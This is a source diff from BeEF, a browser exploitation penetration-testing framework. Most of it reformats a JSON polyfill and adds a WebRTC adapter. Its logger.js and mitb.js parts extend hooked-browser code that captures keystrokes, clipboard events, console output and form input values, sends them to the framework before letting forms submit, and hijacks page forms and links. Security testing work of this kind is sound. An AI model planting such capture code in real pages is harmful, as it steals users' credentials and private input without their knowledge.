-                f(this.getUTCHours())     + ':' +
-                f(this.getUTCMinutes())   + ':' +
-                f(this.getUTCSeconds())   + 'Z' : null;
+        Date.prototype.toJSON = function () {
+
+            return isFinite(this.valueOf())
+                ? this.getUTCFullYear() + "-" +
+                        f(this.getUTCMonth() + 1) + "-" +
+                        f(this.getUTCDate()) + "T" +
+                        f(this.getUTCHours()) + ":" +
+                        f(this.getUTCMinutes()) + ":" +
+                        f(this.getUTCSeconds()) + "Z"
+                : null;
         };
 
-        String.prototype.toJSON      =
-            Number.prototype.toJSON  =
-            Boolean.prototype.toJSON = function (key) {
-                return this.valueOf();
-            };
+        Boolean.prototype.toJSON = this_value;
+        Number.prototype.toJSON = this_value;
+        String.prototype.toJSON = this_value;
     }
 
-    var cx = /[\u0000\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,
-        escapable = /[\\\"\x00-\x1f\x7f-\x9f\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,
-        gap,
-        indent,
-        meta = {    // table of character substitutions
-            '\b': '\\b',
-            '\t': '\\t',
-            '\n': '\\n',
-            '\f': '\\f',
-            '\r': '\\r',
-            '"' : '\\"',
-            '\\': '\\\\'
-        },
-        rep;
+    var gap;
+    var indent;
+    var meta;
+    var rep;
 
 
     function quote(string) {
@@ -62,12 +74,15 @@ if (!JSON) {
 // Otherwise we must also replace the offending characters with safe escape
 // sequences.
 
-        escapable.lastIndex = 0;
-        return escapable.test(string) ? '"' + string.replace(escapable, function (a) {
-            var c = meta[a];
-            return typeof c === 'string' ? c :
-                '\\u' + ('0000' + a.charCodeAt(0).toString(16)).slice(-4);
-        }) + '"' : '"' + string + '"';
+        rx_escapable.lastIndex = 0;
+        return rx_escapable.test(string)
+            ? "\"" + string.replace(rx_escapable, function (a) {
+                var c = meta[a];
+                return typeof c === "string"
+                    ? c
+                    : "\\u" + ("0000" + a.charCodeAt(0).toString(16)).slice(-4);
+            }) + "\""
+            : "\"" + string + "\"";
     }
 
 
@@ -75,59 +90,61 @@ if (!JSON) {
 
 // Produce a string from holder[key].
 
-        var i,          // The loop counter.
-            k,          // The member key.
-            v,          // The member value.
-            length,
-            mind = gap,
-            partial,
-            value = holder[key];
+        var i;          // The loop counter.
+        var k;          // The member key.
+        var v;          // The member value.
+        var length;
+        var mind = gap;
+        var partial;
+        var value = holder[key];
 
 // If the value has a toJSON method, call it to obtain a replacement value.
 
-        if (value && typeof value === 'object' &&
-                typeof value.toJSON === 'function') {
+        if (value && typeof value === "object" &&
+                typeof value.toJSON === "function") {
             value = value.toJSON(key);
         }
 
 // If we were called with a replacer function, then call the replacer to
 // obtain a replacement value.
 
-        if (typeof rep === 'function') {
+        if (typeof rep === "function") {
             value = rep.call(holder, key, value);
         }
 
 // What happens next depends on the value's type.
 
         switch (typeof value) {
-        case 'string':
+        case "string":
             return quote(value);
 
-        case 'number':
+        case "number":
 
 // JSON numbers must be finite. Encode non-finite numbers as null.
 
-            return isFinite(value) ? String(value) : 'null';
+            return isFinite(value)
+                ? String(value)
+                : "null";
 
-        case 'boolean':
-        case 'null':
+        case "boolean":
+        case "null":
 
 // If the value is a boolean or null, convert it to a string. Note:
-// typeof null does not produce 'null'. The case is included here in
+// typeof null does not produce "null". The case is included here in
 // the remote chance that this gets fixed someday.
 
             return String(value);
 
-// If the type is 'object', we might be dealing with an object or an array or
+// If the type is "object", we might be dealing with an object or an array or
 // null.
 
-        case 'object':
+        case "object":
 
-// Due to a specification blunder in ECMAScript, typeof null is 'object',
+// Due to a specification blunder in ECMAScript, typeof null is "object",
 // so watch out for that case.
 
             if (!value) {
-                return 'null';
+                return "null";
             }
 
 // Make an array to hold the partial results of stringifying this object value.
@@ -137,36 +154,42 @@ if (!JSON) {
 
 // Is the value an array?
 
-            if (Object.prototype.toString.apply(value) === '[object Array]') {
+            if (Object.prototype.toString.apply(value) === "[object Array]") {
 
 // The value is an array. Stringify every element. Use null as a placeholder
 // for non-JSON values.
 
                 length = value.length;
                 for (i = 0; i < length; i += 1) {
-                    partial[i] = str(i, value) || 'null';
+                    partial[i] = str(i, value) || "null";
                 }
 
 // Join all of the elements together, separated with commas, and wrap them in
 // brackets.
 
-                v = partial.length === 0 ? '[]' : gap ?
-                    '[\n' + gap + partial.join(',\n' + gap) + '\n' + mind + ']' :
-                    '[' + partial.join(',') + ']';
+                v = partial.length === 0
+                    ? "[]"
+                    : gap
+                        ? "[\n" + gap + partial.join(",\n" + gap) + "\n" + mind + "]"
+                        : "[" + partial.join(",") + "]";
                 gap = mind;
                 return v;
             }
 
 // If the replacer is an array, use it to select the members to be stringified.
 
-            if (rep && typeof rep === 'object') {
+            if (rep && typeof rep === "object") {
                 length = rep.length;
                 for (i = 0; i < length; i += 1) {
-                    if (typeof rep[i] === 'string') {
+                    if (typeof rep[i] === "string") {
                         k = rep[i];
                         v = str(k, value);
                         if (v) {
-                            partial.push(quote(k) + (gap ? ': ' : ':') + v);
+                            partial.push(quote(k) + (
+                                gap
+                                    ? ": "
+                                    : ":"
+                            ) + v);
                         }
                     }
                 }
@@ -178,7 +201,11 @@ if (!JSON) {
                     if (Object.prototype.hasOwnProperty.call(value, k)) {
                         v = str(k, value);
                         if (v) {
-                            partial.push(quote(k) + (gap ? ': ' : ':') + v);
+                            partial.push(quote(k) + (
+                                gap
+                                    ? ": "
+                                    : ":"
+                            ) + v);
                         }
                     }
                 }
@@ -187,9 +214,11 @@ if (!JSON) {
 // Join all of the member texts together, separated with commas,
 // and wrap them in braces.
 
-            v = partial.length === 0 ? '{}' : gap ?
-                '{\n' + gap + partial.join(',\n' + gap) + '\n' + mind + '}' :
-                '{' + partial.join(',') + '}';
+            v = partial.length === 0
+                ? "{}"
+                : gap
+                    ? "{\n" + gap + partial.join(",\n" + gap) + "\n" + mind + "}"
+                    : "{" + partial.join(",") + "}";
             gap = mind;
             return v;
         }
@@ -197,7 +226,16 @@ if (!JSON) {
 
 // If the JSON object does not yet have a stringify method, give it one.
 
-    if (typeof JSON.stringify !== 'function') {
+    if (typeof JSON.stringify !== "function") {
+        meta = {    // table of character substitutions
+            "\b": "\\b",
+            "\t": "\\t",
+            "\n": "\\n",
+            "\f": "\\f",
+            "\r": "\\r",
+            "\"": "\\\"",
+            "\\": "\\\\"
+        };
         JSON.stringify = function (value, replacer, space) {
 
 // The stringify method takes a value and an optional replacer, and an optional
@@ -207,20 +245,20 @@ if (!JSON) {
 // produce text that is more easily readable.
 
             var i;
-            gap = '';
-            indent = '';
+            gap = "";
+            indent = "";
 
 // If the space parameter is a number, make an indent string containing that
 // many spaces.
 
-            if (typeof space === 'number') {
+            if (typeof space === "number") {
                 for (i = 0; i < space; i += 1) {
-                    indent += ' ';
+                    indent += " ";
                 }
 
 // If the space parameter is a string, it will be used as the indent string.
 
-            } else if (typeof space === 'string') {
+            } else if (typeof space === "string") {
                 indent = space;
             }
 
@@ -228,23 +266,23 @@ if (!JSON) {
 // Otherwise, throw an error.
 
             rep = replacer;
-            if (replacer && typeof replacer !== 'function' &&
-                    (typeof replacer !== 'object' ||
-                    typeof replacer.length !== 'number')) {
-                throw new Error('JSON.stringify');
+            if (replacer && typeof replacer !== "function" &&
+                    (typeof replacer !== "object" ||
+                    typeof replacer.length !== "number")) {
+                throw new Error("JSON.stringify");
             }
 
-// Make a fake root object containing our value under the key of ''.
+// Make a fake root object containing our value under the key of "".
 // Return the result of stringifying the value.
 
-            return str('', {'': value});
+            return str("", {"": value});
         };
     }
 
 
 // If the JSON object does not yet have a parse method, give it one.
 
-    if (typeof JSON.parse !== 'function') {
+    if (typeof JSON.parse !== "function") {
         JSON.parse = function (text, reviver) {
 
 // The parse method takes a text and an optional reviver function, and returns
@@ -257,8 +295,10 @@ if (!JSON) {
 // The walk method is used to recursively walk the resulting structure so
 // that modifications can be made.
 
-                var k, v, value = holder[key];
-                if (value && typeof value === 'object') {
+                var k;
+                var v;
+                var value = holder[key];
+                if (value && typeof value === "object") {
                     for (k in value) {
                         if (Object.prototype.hasOwnProperty.call(value, k)) {
                             v = walk(value, k);
@@ -279,49 +319,54 @@ if (!JSON) {
 // incorrectly, either silently deleting them, or treating them as line endings.
 
             text = String(text);
-            cx.lastIndex = 0;
-            if (cx.test(text)) {
-                text = text.replace(cx, function (a) {
-                    return '\\u' +
-                        ('0000' + a.charCodeAt(0).toString(16)).slice(-4);
+            rx_dangerous.lastIndex = 0;
+            if (rx_dangerous.test(text)) {
+                text = text.replace(rx_dangerous, function (a) {
+                    return "\\u" +
+                            ("0000" + a.charCodeAt(0).toString(16)).slice(-4);
                 });
             }
 
 // In the second stage, we run the text against regular expressions that look
-// for non-JSON patterns. We are especially concerned with '()' and 'new'
-// because they can cause invocation, and '=' because it can cause mutation.
+// for non-JSON patterns. We are especially concerned with "()" and "new"
+// because they can cause invocation, and "=" because it can cause mutation.
 // But just to be safe, we want to reject all unexpected forms.
 
 // We split the second stage into 4 regexp operations in order to work around
 // crippling inefficiencies in IE's and Safari's regexp engines. First we
-// replace the JSON backslash pairs with '@' (a non-JSON character). Second, we
-// replace all simple value tokens with ']' characters. Third, we delete all
+// replace the JSON backslash pairs with "@" (a non-JSON character). Second, we
+// replace all simple value tokens with "]" characters. Third, we delete all
 // open brackets that follow a colon or comma or that begin the text. Finally,
-// we look to see that the remaining characters are only whitespace or ']' or
-// ',' or ':' or '{' or '}'. If that is so, then the text is safe for eval.
+// we look to see that the remaining characters are only whitespace or "]" or
+// "," or ":" or "{" or "}". If that is so, then the text is safe for eval.
 
-            if (/^[\],:{}\s]*$/
-                    .test(text.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g, '@')
-                        .replace(/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g, ']')
-                        .replace(/(?:^|:|,)(?:\s*\[)+/g, ''))) {
+            if (
+                rx_one.test(
+                    text
+                        .replace(rx_two, "@")
+                        .replace(rx_three, "]")
+                        .replace(rx_four, "")
+                )
+            ) {
 
 // In the third stage we use the eval function to compile the text into a
-// JavaScript structure. The '{' operator is subject to a syntactic ambiguity
+// JavaScript structure. The "{" operator is subject to a syntactic ambiguity
 // in JavaScript: it can begin a block or an object literal. We wrap the text
 // in parens to eliminate the ambiguity.
 
-                j = eval('(' + text + ')');
+                j = eval("(" + text + ")");
 
 // In the optional fourth stage, we recursively walk the new structure, passing
 // each name/value pair to a reviver function for possible transformation.
 
-                return typeof reviver === 'function' ?
-                    walk({'': j}, '') : j;
+                return (typeof reviver === "function")
+                    ? walk({"": j}, "")
+                    : j;
             }
 
 // If the text is not JSON parseable, then a SyntaxError is thrown.
 
-            throw new SyntaxError('JSON.parse');
+            throw new SyntaxError("JSON.parse");
         };
     }
 }());

core/main/client/lib/webrtcadapter.js

@@ -0,0 +1,414 @@
+/*
+ *  Copyright (c) 2014 The WebRTC project authors. All Rights Reserved.
+ *
+ *  Use of this source code is governed by a BSD-style license
+ *  that can be found in the LICENSE file in the root of the source
+ *  tree.
+ */
+
+/* More information about these options at jshint.com/docs/options */
+/* jshint browser: true, camelcase: true, curly: true, devel: true,
+   eqeqeq: true, forin: false, globalstrict: true, node: true,
+   quotmark: single, undef: true, unused: strict */
+/* global mozRTCIceCandidate, mozRTCPeerConnection, Promise,
+mozRTCSessionDescription, webkitRTCPeerConnection, MediaStreamTrack */
+/* exported trace,requestUserMedia */
+
+'use strict';
+
+var getUserMedia = null;
+var attachMediaStream = null;
+var reattachMediaStream = null;
+var webrtcDetectedBrowser = null;
+var webrtcDetectedVersion = null;
+var webrtcMinimumVersion = null;
+
+function trace(text) {
+  // This function is used for logging.
+  if (text[text.length - 1] === '\n') {
+    text = text.substring(0, text.length - 1);
+  }
+  if (window.performance) {
+    var now = (window.performance.now() / 1000).toFixed(3);
+    beef.debug(now + ': ' + text);
+  } else {
+    beef.debug(text);
+  }
+}
+
+if (navigator.mozGetUserMedia) {
+
+  webrtcDetectedBrowser = 'firefox';
+
+  // the detected firefox version.
+  webrtcDetectedVersion =
+    parseInt(navigator.userAgent.match(/Firefox\/([0-9]+)\./)[1], 10);
+
+  // the minimum firefox version still supported by adapter.
+  webrtcMinimumVersion = 31;
+
+  // The RTCPeerConnection object.
+  window.RTCPeerConnection = function(pcConfig, pcConstraints) {
+    if (webrtcDetectedVersion < 38) {
+      // .urls is not supported in FF < 38.
+      // create RTCIceServers with a single url.
+      if (pcConfig && pcConfig.iceServers) {
+        var newIceServers = [];
+        for (var i = 0; i < pcConfig.iceServers.length; i++) {
+          var server = pcConfig.iceServers[i];
+          if (server.hasOwnProperty('urls')) {
+            for (var j = 0; j < server.urls.length; j++) {
+              var newServer = {
+                url: server.urls[j]
+              };
+              if (server.urls[j].indexOf('turn') === 0) {
+                newServer.username = server.username;
+                newServer.credential = server.credential;
+              }
+              newIceServers.push(newServer);
+            }
+          } else {
+            newIceServers.push(pcConfig.iceServers[i]);
+          }
+        }
+        pcConfig.iceServers = newIceServers;
+      }
+    }
+    return new mozRTCPeerConnection(pcConfig, pcConstraints);
+  };
+
+  try {
+    // The RTCSessionDescription object.
+    window.RTCSessionDescription = mozRTCSessionDescription;
+
+    // The RTCIceCandidate object.
+    window.RTCIceCandidate = mozRTCIceCandidate;
+
+  }catch(err) {
+    
+  }
+
+  // getUserMedia constraints shim.
+  getUserMedia = (webrtcDetectedVersion < 38) ?
+      function(c, onSuccess, onError) {
+    var constraintsToFF37 = function(c) {
+      if (typeof c !== 'object' || c.require) {
+        return c;
+      }
+      var require = [];
+      Object.keys(c).forEach(function(key) {
+        var r = c[key] = (typeof c[key] === 'object') ?
+            c[key] : {ideal: c[key]};
+        if (r.exact !== undefined) {
+          r.min = r.max = r.exact;
+          delete r.exact;
+        }
+        if (r.min !== undefined || r.max !== undefined) {
+          require.push(key);
+        }
+        if (r.ideal !== undefined) {
+          c.advanced = c.advanced || [];
+          var oc = {};
+          oc[key] = {min: r.ideal, max: r.ideal};
+          c.advanced.push(oc);
+          delete r.ideal;
+          if (!Object.keys(r).length) {
+            delete c[key];
+          }
+        }
+      });
+      if (require.length) {
+        c.require = require;
+      }
+      return c;
+    };
+    beef.debug('spec: ' + JSON.stringify(c));
+    c.audio = constraintsToFF37(c.audio);
+    c.video = constraintsToFF37(c.video);
+    beef.debug('ff37: ' + JSON.stringify(c));
+    return navigator.mozGetUserMedia(c, onSuccess, onError);
+  } : navigator.mozGetUserMedia.bind(navigator);
+
+  navigator.getUserMedia = getUserMedia;
+
+  // Shim for mediaDevices on older versions.
+  if (!navigator.mediaDevices) {
+    navigator.mediaDevices = {getUserMedia: requestUserMedia,
+      addEventListener: function() { },
+      removeEventListener: function() { }
+    };
+  }
+  navigator.mediaDevices.enumerateDevices =
+      navigator.mediaDevices.enumerateDevices || function() {
+    return new Promise(function(resolve) {
+      var infos = [
+        {kind: 'audioinput', deviceId: 'default', label:'', groupId:''},
+        {kind: 'videoinput', deviceId: 'default', label:'', groupId:''}
+      ];
+      resolve(infos);
+    });
+  };
+
+  if (webrtcDetectedVersion < 41) {
+    // Work around http://bugzil.la/1169665
+    var orgEnumerateDevices =
+        navigator.mediaDevices.enumerateDevices.bind(navigator.mediaDevices);
+    navigator.mediaDevices.enumerateDevices = function() {
+      return orgEnumerateDevices().then(undefined, function(e) {
+        if (e.name === 'NotFoundError') {
+          return [];
+        }
+        throw e;
+      });
+    };
+  }
+  // Attach a media stream to an element.
+  attachMediaStream = function(element, stream) {
+    beef.debug('Attaching media stream');
+    element.mozSrcObject = stream;
+  };
+
+  reattachMediaStream = function(to, from) {
+    beef.debug('Reattaching media stream');
+    to.mozSrcObject = from.mozSrcObject;
+  };
+
+} else if (navigator.webkitGetUserMedia) {
+
+  webrtcDetectedBrowser = 'chrome';
+
+  // the detected chrome version.
+  webrtcDetectedVersion =
+    parseInt(navigator.userAgent.match(/Chrom(e|ium)\/([0-9]+)\./)[2], 10);
+
+  // the minimum chrome version still supported by adapter.
+  webrtcMinimumVersion = 38;
+
+  // The RTCPeerConnection object.
+  window.RTCPeerConnection = function(pcConfig, pcConstraints) {
+    var pc = new webkitRTCPeerConnection(pcConfig, pcConstraints);
+    var origGetStats = pc.getStats.bind(pc);
+    pc.getStats = function(selector, successCallback, errorCallback) { // jshint ignore: line
+      // If selector is a function then we are in the old style stats so just
+      // pass back the original getStats format to avoid breaking old users.
+      if (typeof selector === 'function') {
+        return origGetStats(selector, successCallback);
+      }
+
+      var fixChromeStats = function(response) {
+        var standardReport = {};
+        var reports = response.result();
+        reports.forEach(function(report) {
+          var standardStats = {
+            id: report.id,
+            timestamp: report.timestamp,
+            type: report.type
+          };
+          report.names().forEach(function(name) {
+            standardStats[name] = report.stat(name);
+          });
+          standardReport[standardStats.id] = standardStats;
+        });
+
+        return standardReport;
+      };
+      var successCallbackWrapper = function(response) {
+        successCallback(fixChromeStats(response));
+      };
+      return origGetStats(successCallbackWrapper, selector);
+    };
+
+    return pc;
+  };
+
+  // add promise support
+  ['createOffer', 'createAnswer'].forEach(function(method) {
+    var nativeMethod = webkitRTCPeerConnection.prototype[method];
+    webkitRTCPeerConnection.prototype[method] = function() {
+      var self = this;
+      if (arguments.length < 1 || (arguments.length === 1 &&
+          typeof(arguments[0]) === 'object')) {
+        var opts = arguments.length === 1 ? arguments[0] : undefined;
+        return new Promise(function(resolve, reject) {
+          nativeMethod.apply(self, [resolve, reject, opts]);
+        });
+      } else {
+        return nativeMethod.apply(this, arguments);
+      }
+    };
+  });
+
+  ['setLocalDescription', 'setRemoteDescription',
+      'addIceCandidate'].forEach(function(method) {
+    var nativeMethod = webkitRTCPeerConnection.prototype[method];
+    webkitRTCPeerConnection.prototype[method] = function() {
+      var args = arguments;
+      var self = this;
+      return new Promise(function(resolve, reject) {
+        nativeMethod.apply(self, [args[0],
+            function() {
+              resolve();
+              if (args.length >= 2) {
+                args[1].apply(null, []);
+              }
+            },
+            function(err) {
+              reject(err);
+              if (args.length >= 3) {
+                args[2].apply(null, [err]);
+              }
+            }]
+          );
+      });
+    };
+  });
+
+  // getUserMedia constraints shim.
+  getUserMedia = function(c, onSuccess, onError) {
+    var constraintsToChrome = function(c) {
+      if (typeof c !== 'object' || c.mandatory || c.optional) {
+        return c;
+      }
+      var cc = {};
+      Object.keys(c).forEach(function(key) {
+        if (key === 'require' || key === 'advanced') {
+          return;
+        }
+        var r = (typeof c[key] === 'object') ? c[key] : {ideal: c[key]};
+        if (r.exact !== undefined && typeof r.exact === 'number') {
+          r.min = r.max = r.exact;
+        }
+        var oldname = function(prefix, name) {
+          if (prefix) {
+            return prefix + name.charAt(0).toUpperCase() + name.slice(1);
+          }
+          return (name === 'deviceId') ? 'sourceId' : name;
+        };
+        if (r.ideal !== undefined) {
+          cc.optional = cc.optional || [];
+          var oc = {};
+          if (typeof r.ideal === 'number') {
+            oc[oldname('min', key)] = r.ideal;
+            cc.optional.push(oc);
+            oc = {};
+            oc[oldname('max', key)] = r.ideal;
+            cc.optional.push(oc);
+          } else {
+            oc[oldname('', key)] = r.ideal;
+            cc.optional.push(oc);
+          }
+        }
+        if (r.exact !== undefined && typeof r.exact !== 'number') {
+          cc.mandatory = cc.mandatory || {};
+          cc.mandatory[oldname('', key)] = r.exact;
+        } else {
+          ['min', 'max'].forEach(function(mix) {
+            if (r[mix] !== undefined) {
+              cc.mandatory = cc.mandatory || {};
+              cc.mandatory[oldname(mix, key)] = r[mix];
+            }
+          });
+        }
+      });
+      if (c.advanced) {
+        cc.optional = (cc.optional || []).concat(c.advanced);
+      }
+      return cc;
+    };
+    beef.debug('spec:   ' + JSON.stringify(c)); // whitespace for alignment
+    c.audio = constraintsToChrome(c.audio);
+    c.video = constraintsToChrome(c.video);
+    beef.debug('chrome: ' + JSON.stringify(c));
+    return navigator.webkitGetUserMedia(c, onSuccess, onError);
+  };
+  navigator.getUserMedia = getUserMedia;
+
+  // Attach a media stream to an element.
+  attachMediaStream = function(element, stream) {
+    if (typeof element.srcObject !== 'undefined') {
+      element.srcObject = stream;
+    } else if (typeof element.src !== 'undefined') {
+      element.src = URL.createObjectURL(stream);
+    } else {
+      beef.debug('Error attaching stream to element.');
+    }
+  };
+
+  reattachMediaStream = function(to, from) {
+    to.src = from.src;
+  };
+
+  if (!navigator.mediaDevices) {
+    navigator.mediaDevices = {getUserMedia: requestUserMedia,
+                              enumerateDevices: function() {
+      return new Promise(function(resolve) {
+        var kinds = {audio: 'audioinput', video: 'videoinput'};
+        return MediaStreamTrack.getSources(function(devices) {
+          resolve(devices.map(function(device) {
+            return {label: device.label,
+                    kind: kinds[device.kind],
+                    deviceId: device.id,
+                    groupId: ''};
+          }));
+        });
+      });
+    }};
+    // in case someone wants to listen for the devicechange event.
+    navigator.mediaDevices.addEventListener = function() { };
+    navigator.mediaDevices.removeEventListener = function() { };
+  }
+} else if (navigator.mediaDevices && navigator.userAgent.match(
+    /Edge\/(\d+).(\d+)$/)) {
+  webrtcDetectedBrowser = 'edge';
+
+  webrtcDetectedVersion =
+    parseInt(navigator.userAgent.match(/Edge\/(\d+).(\d+)$/)[2], 10);
+
+  // the minimum version still supported by adapter.
+  webrtcMinimumVersion = 12;
+
+  attachMediaStream = function(element, stream) {
+    element.srcObject = stream;
+  };
+  reattachMediaStream = function(to, from) {
+    to.srcObject = from.srcObject;
+  };
+} else {
+  // console.log('Browser does not appear to be WebRTC-capable');
+}
+
+// Returns the result of getUserMedia as a Promise.
+function requestUserMedia(constraints) {
+  return new Promise(function(resolve, reject) {
+    getUserMedia(constraints, resolve, reject);
+  });
+}
+
+if (typeof module !== 'undefined') {
+  module.exports = {
+    RTCPeerConnection: window.RTCPeerConnection,
+    getUserMedia: getUserMedia,
+    attachMediaStream: attachMediaStream,
+    reattachMediaStream: reattachMediaStream,
+    webrtcDetectedBrowser: webrtcDetectedBrowser,
+    webrtcDetectedVersion: webrtcDetectedVersion,
+    webrtcMinimumVersion: webrtcMinimumVersion
+    //requestUserMedia: not exposed on purpose.
+    //trace: not exposed on purpose.
+  };
+} else if ((typeof require === 'function') && (typeof define === 'function')) {
+  // Expose objects and functions when RequireJS is doing the loading.
+  define([], function() {
+    return {
+      RTCPeerConnection: window.RTCPeerConnection,
+      getUserMedia: getUserMedia,
+      attachMediaStream: attachMediaStream,
+      reattachMediaStream: reattachMediaStream,
+      webrtcDetectedBrowser: webrtcDetectedBrowser,
+      webrtcDetectedVersion: webrtcDetectedVersion,
+      webrtcMinimumVersion: webrtcMinimumVersion
+      //requestUserMedia: not exposed on purpose.
+      //trace: not exposed on purpose.
+    };
+  });
+}

core/main/client/logger.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -43,7 +43,12 @@ beef.logger = {
         this.y = 0;
         this.target = null;
         this.data = null;
+        this.mods = null;
     },
+    /**
+     * Prevents from recursive event handling on form submission
+     */
+    in_submit: false,
 	
 	/**
 	 * Starts the logger
@@ -55,6 +60,45 @@ beef.logger = {
 		var d = new Date();
 		this.time = d.getTime();
 
+        $j(document).off('keypress');
+        $j(document).off('click');
+        $j(window).off('focus');
+        $j(window).off('blur');
+        $j('form').off('submit');
+        $j(document.body).off('copy');
+        $j(document.body).off('cut');
+        $j(document.body).off('paste');
+
+        if (!!window.console && typeof window.console == "object") {
+          try {
+            var oldInfo = window.console.info;
+            console.info = function (message) {
+              beef.logger.console('info', message);
+              oldInfo.apply(console, arguments);
+            };
+            var oldLog = window.console.log;
+            console.log = function (message) {
+              beef.logger.console('log', message);
+              oldLog.apply(console, arguments);
+            };
+            var oldWarn = window.console.warn;
+            console.warn = function (message) {
+              beef.logger.console('warn', message);
+              oldWarn.apply(console, arguments);
+            };
+            var oldDebug = window.console.debug;
+            console.debug = function (message) {
+              beef.logger.console('debug', message);
+              oldDebug.apply(console, arguments);
+            };
+            var oldError = window.console.error;
+            console.error = function (message) {
+              beef.logger.console('error', message);
+              oldError.apply(console, arguments);
+            };
+         } catch(e) {}
+       }
+
 		$j(document).keypress(
 			function(e) { beef.logger.keypress(e); }
 		).click(
@@ -66,17 +110,19 @@ beef.logger = {
 			function(e) { beef.logger.win_blur(e); }
 		);
 		$j('form').submit(
-			function(e) { beef.logger.submit(e); }
+			function(e) { 
+                beef.logger.submit(e); 
+            }
 		);
-		document.body.oncopy = function() {
+		$j(document.body).on('copy', function() {
 			setTimeout("beef.logger.copy();", 10);
-		};
-		document.body.oncut = function() {
+		});
+		$j(document.body).on('cut', function() {
 			setTimeout("beef.logger.cut();", 10);
-		};
-		document.body.onpaste = function() {
+		});
+		$j(document.body).on('paste', function() {
 			beef.logger.paste();
-		}
+		});
 	},
 	
 	/**
@@ -85,7 +131,15 @@ beef.logger = {
 	stop: function() {
 		this.running = false;
 		clearInterval(this.timer);
-		$j(document).keypress(null);
+        $j(document).off('keypress');
+        $j(document).off('click');
+        $j(window).off('focus');
+        $j(window).off('blur');
+        $j('form').off('submit');
+        $j(document.body).off('copy');
+        $j(document.body).off('cut');
+        $j(document.body).off('paste');
+        // TODO: reset console
 	},
 
     /**
@@ -163,6 +217,18 @@ beef.logger = {
 		} catch(e) {}
 	},
 
+        /**
+         * Console function fires when data is sent to the browser console.
+         */
+        console: function(type, message) {
+		try {
+			var c = new beef.logger.e();
+			c.type = 'console';
+			c.data = type + ': ' + message;
+			this.events.push(c);
+		} catch(e) {}
+	},
+
 	/**
 	 * Paste function fires when the user pastes data from the clipboard.
 	 */
@@ -180,16 +246,37 @@ beef.logger = {
      * TODO: Cleanup this function
 	 */
 	submit: function(e) {
+        if (beef.logger.in_submit) {
+            return true;
+        }
 		try {
 			var f = new beef.logger.e();
-			var values = "";
 			f.type = 'submit';
 			f.target = beef.logger.get_dom_identifier(e.target);
+            var jqForms = $j(e.target);
+            var values = jqForms.find('input').map(function() { 
+                    var inp = $j(this);    
+                    return inp.attr('name') + '=' + inp.val(); 
+                }).get().join();
+            beef.debug('submitting form inputs: ' + values);
+            /*
 			for (var i = 0; i < e.target.elements.length; i++) {
 	            values += "["+i+"] "+e.target.elements[i].name+"="+e.target.elements[i].value+"\n";
 	        }
-			f.data = 'Action: '+$j(e.target).attr('action')+' - Method: '+$j(e.target).attr('method') + ' - Values:\n'+values;
+            */
+			f.data = 'Action: '+jqForms.attr('action')+' - Method: '+$j(e.target).attr('method') + ' - Values:\n'+values;
 			this.events.push(f);
+            this.queue();
+            this.target = null;
+            beef.net.flush(function done() {
+                beef.debug("Submitting the form");
+                beef.logger.in_submit = true;
+                jqForms.submit();
+                beef.logger.in_submit = false;
+                beef.debug("Done submitting");
+            });
+            e.preventDefault();
+            return false;
 		} catch(e) {}
 	},
 	
@@ -233,17 +320,28 @@ beef.logger = {
 	 */
 	parse_stream: function() {
 		var s = '';
-		for (var i in this.stream)
-		{
-			//s += (this.stream[i]['modifiers']['alt']) ? '*alt* ' : '';
-			//s += (this.stream[i]['modifiers']['ctrl']) ? '*ctrl* ' : '';
-			//s += (this.stream[i]['modifiers']['shift']) ? 'Shift+' : '';
-			s += String.fromCharCode(this.stream[i]['char']);
+        var mods = '';
+		for (var i in this.stream){
+         try{
+            var mod = this.stream[i]['modifiers'];
+            s += String.fromCharCode(this.stream[i]['char']);
+            if(typeof mod != 'undefined' &&
+                      (mod['alt'] == true ||
+                      mod['ctrl'] == true ||
+                      mod['shift'] == true)){
+                mods += (mod['alt']) ? ' [Alt] ' : '';
+                mods += (mod['ctrl']) ? ' [Ctrl] ' : '';
+                mods += (mod['shift']) ? ' [Shift] ' : '';
+                mods += String.fromCharCode(this.stream[i]['char']);
+            }
+
+         }catch(e){}
 		}
         var k = new beef.logger.e();
         k.type = 'keys';
         k.target = beef.logger.get_dom_identifier();
         k.data = s;
+        k.mods = mods;
         return k;
 	},
 	

core/main/client/mitb.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -33,11 +33,11 @@ beef.mitb = {
 
                         //GET request
                         if (method == "GET") {
-                            //GET request -> cross-domain
+                            //GET request -> cross-origin
                             if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
                                 beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
                                 window.open(url);
-                            }else { //GET request -> same-domain
+                            }else { //GET request -> same-origin
                                 beef.mitb.sniff("GET [Ajax Request]: " + url);
                                 if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
                                     var title = "";
@@ -106,7 +106,7 @@ beef.mitb = {
                 history.pushState({ Be:"EF" }, title, e.currentTarget);
             }
         } catch (e) {
-            console.error('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
+            beef.debug('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
         }
         return false;
     },
@@ -114,18 +114,39 @@ beef.mitb = {
     // Hooks forms and prevents them from linking away
     poisonForm:function (form) {
         form.onsubmit = function (e) {
+
+            // Collect <input> tags.
             var inputs = form.getElementsByTagName("input");
             var query = "";
             for (var i = 0; i < inputs.length; i++) {
-                if (i > 0 && i < inputs.length - 1) query += "&";
                 switch (inputs[i].type) {
                     case "submit":
                         break;
                     default:
-                        query += inputs[i].name + "=" + inputs[i].value;
+                        query += inputs[i].name + "=" + inputs[i].value + '&';
                         break;
                 }
             }
